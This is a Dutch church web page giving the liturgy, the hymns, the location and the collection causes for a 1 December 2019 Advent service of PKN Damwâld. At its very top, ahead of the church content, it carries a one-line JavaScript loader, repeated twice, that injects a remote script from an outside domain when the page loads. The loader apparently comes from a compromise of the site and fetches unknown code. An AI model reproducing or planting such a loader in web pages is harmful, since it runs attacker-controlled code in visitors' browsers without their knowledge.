;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 1 december 2019 9:30 uur - PKN Damwâld
zondag 1 december 2019
09:30 uur
1e Advent en er is koffiedrinken na de dienst

Kerkdienst zondag 1 december 2019 9:30 uur

Informatie

Voorganger:Dhr. W. Feddema, Driezum
Organist:Jaap van der Horn
Mededeling:1e Advent en er is koffiedrinken na de dienst
Liturgie
We zingen: Gezang 265 : 1, 2, 3, 4, 5 en 21
Welkom
Intochtslied Psalm 122 : 1 en 3
Stil Gebed, Bemoediging en Groet
1ste Adventskaars wordt aangestoken
We zingen: Gezang 26 : 1 en 2
Adventsproject king Kids
We zingen: Projectlied
Een regel van geloof .
We zingen: Gezang 26 : 4
Gebed opening van Woord
We lezen: Micha 4 : 1 - 8
We zingen: Psalm 125 : 1 en 2
Preek .
We zingen: Elb 405
Dank- en Voorbede
Collecte
We zingen: Elb 411
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Aidswezen in Zambia

Kinderen in de Knel - Aidswezen in Zambia
In Zambia zijn er wel 20.000 gezinnen, waar jongeren aan het hoofd staan omdat hun ouders overleden zijn aan aids. Deze kinderen hebben een zwaar bestaan. Ze staan er vaak alleen voor, omdat mensen bang zijn ook aids te krijgen. De Raad van Kerken in Zambia stimuleert kerken om naar deze kinderen om te kijken. Kerkleiders worden daarin getraind en kinderen praktisch ondersteund. Chisengo kreeg geld om een eigen bedrijfje te starten. Nu fokt ze varkens, die ze verkoopt in de grote stad. Het gezin kan weer drie keer per dag eten en haar broertjes en zusjes kunnen naar school.

Tweede collecte: Kerk
Uitganscollecte: Kerk